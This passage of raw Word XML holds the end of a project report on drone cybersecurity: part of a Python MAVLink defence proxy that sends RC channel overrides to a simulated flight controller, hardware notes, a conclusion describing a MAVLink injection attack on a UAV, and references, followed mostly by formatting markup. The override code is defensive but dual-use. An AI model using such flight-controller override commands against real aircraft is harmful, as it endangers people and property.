        <w:t># Counter-action: Send neutralizing baseline command override</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>self.master.mav.rc_channels_override_send(</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>self.master.target_system,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>self.master.target_component,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>self.base_pwm, self.base_pwm, self.base_pwm, self.base_pwm,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>0, 0, 0, 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>else:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>print(f"[INFO] Telemetry nominal. Channel 1 PWM: {chan1}")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>time.sleep(0.01)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>except KeyboardInterrupt:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>print("\nProxy terminated by user. Releasing control.")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> == '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t>':</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># Point this to your SITL TCP endpoint</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>proxy = MAVLinkDefenseProxy('tcp:127.0.0.1:5762')</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>proxy.run_proxy()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AD98E3" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CCF0272" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Hardware Deployment and implementation pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9DC247" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hardware </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B33092B" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>I used Pixhawk to connect to my workstation using physical UART-to-USB bridge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF37542" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>Firmware hardening using flashed defence logic directly into Nuttx RTOS or ESP32 coprocessor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E65F7D" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>Port remapping done from TCP port to physical serial COM port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E9F136" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD7844C" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FB5616" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>This project was able to connect gaps between aeronautical engineering and cyber security showing that physical airframe and digital telemetry can not be secured in isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D227B36" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>Bvy designing a controlled Mav link injection vector, I roved that high frequency cyber attacks can easily exploit the parts of the airframe that resonant with sensors. The implementation of real life and real time software defined defence proxy and robust architecture that detects and neutralize cyber threats before they damage the UAV.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDD8BB3" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>Fortunately, this implementation of cyber-physical components provides resistance against attacks and stands as next generation intelligent drone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14453E01" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This proof of concept can be easily scaled to swarm drone technology which perfectly synchronize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F685619" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20BBDD98" w14:textId="0FD7B742" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>References &amp; Software Documentation</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ArduPilot Development Team.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ArduPilot SITL (Software In The Loop) Documentation. Retrieved from [https://ardupilot.org/dev/docs/sitl-simulator-software-in-the-loop.html](https://ardupilot.org/dev/docs/sitl-simulator-software-in-the-loop.html)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pymavlink Community.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Pymavlink Documentation &amp; Protocol Implementation.Python MAVLink library available at [https://github.com/ArduPilot/pymavlink](https://github.com/ArduPilot/pymavlink)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MathWorks.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MATLAB &amp; Simulink R2023b: Control System Toolbox and Frequency Response Estimation. Available at [https://www.mathworks.com/products/matlab.html](https://www.mathworks.com/products/matlab.html)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dassault Systèmes.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SolidWorks 3D CAD: Parametric Modeling and Composite Airframe Structural Analysis. Available at [https://www.solidworks.com/](https://www.solidworks.com/)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mission Planner.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Open-source ground control station for ArduPilot. Available at [https://ardupilot.org/planner/](https://ardupilot.org/planner/)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6230C1E5" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005D7421">
      <w:headerReference w:type="default" r:id="rId13"/>
      <w:footerReference w:type="default" r:id="rId14"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
      <w:pgNumType w:start="0"/>
      <w:cols w:space="720"/>
      <w:formProt w:val="0"/>
      <w:docGrid w:linePitch="600" w:charSpace="3276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58AC0E" w14:textId="77777777" w:rsidR="0009262C" w:rsidRDefault="0009262C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0AD72CBC" w14:textId="77777777" w:rsidR="0009262C" w:rsidRDefault="000926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Liberation Sans">
    <w:altName w:val="Arial"/>
    <w:charset w:val="01"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="DejaVu San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ACF4E" w14:textId="0E76BE92" w:rsidR="00CC118D" w:rsidRDefault="00CC118D" w:rsidP="00CC118D">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="156082"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve"> UAV SWARMS</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="4530FD63" w14:textId="310D0494" w:rsidR="00CC118D" w:rsidRDefault="00CC118D">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="6FE6F6C1" w14:textId="77777777" w:rsidR="00CC118D" w:rsidRDefault="00CC118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C7EA50" w14:textId="77777777" w:rsidR="0009262C" w:rsidRDefault="0009262C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="43786A2D" w14:textId="77777777" w:rsidR="0009262C" w:rsidRDefault="0009262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46185474"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="674753E5" w14:textId="77777777" w:rsidR="002C1552" w:rsidRDefault="002C1552">
        <w:pPr>
          <w:pStyle w:val="Header"/>
          <w:jc w:val="right"/>
        </w:pPr>
      </w:p>
      <w:p w14:paraId="570A6FFA" w14:textId="026B1064" w:rsidR="002C1552" w:rsidRDefault="002C1552" w:rsidP="002C1552">
        <w:pPr>
          <w:pStyle w:val="Header"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="10DFC0C0" w14:textId="5F9E4D5A" w:rsidR="005D7421" w:rsidRDefault="005D7421">
    <w:pPr>
      <w:pStyle w:val="Normal1"/>
      <w:spacing w:line="264"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474747"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="69FE8DF2"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="520E1D1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A64DC20"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:pStyle w:val="Heading1"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:pStyle w:val="Heading2"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:pStyle w:val="Heading3"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:pStyle w:val="Heading4"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:pStyle w:val="Heading5"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:pStyle w:val="Heading6"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:pStyle w:val="Heading7"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:pStyle w:val="Heading8"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:pStyle w:val="Heading9"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="842596381">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="9117005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7421"/>
    <w:rsid w:val="0009262C"/>
    <w:rsid w:val="002C1552"/>
    <w:rsid w:val="005D7421"/>
    <w:rsid w:val="00A212E0"/>
    <w:rsid w:val="00B36E62"/>
    <w:rsid w:val="00BD0E05"/>
    <w:rsid w:val="00CC118D"/>
    <w:rsid w:val="00D23D0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85796C"/>
  <w15:docId w15:val="{DBCE2485-9276-4072-B2A8-0DBC33BBC9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Times New Roman"/>
        <w:kern w:val="2"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-GB"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pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="360" w:after="80"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:eastAsia="Times New Roman" w:hAnsi="Aptos Display"/>
      <w:color w:val="0F4761"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="160" w:after="80"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:eastAsia="Times New Roman" w:hAnsi="Aptos Display"/>
      <w:color w:val="0F4761"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="160" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:color w:val="0F4761"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="80" w:after="40"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="80" w:after="40"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:color w:val="0F4761"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:color w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>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qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:eastAsia="Times New Roman" w:hAnsi="Aptos Display" w:cs="Times New Roman"/>
      <w:color w:val="0F4761"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:eastAsia="Times New Roman" w:hAnsi="Aptos Display" w:cs="Times New Roman"/>
      <w:color w:val="0F4761"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="0F4761"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="0F4761"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="272727"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:eastAsia="Times New Roman" w:hAnsi="Aptos Display" w:cs="Times New Roman"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="2"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="595959"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="IntenseQuoteChar">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
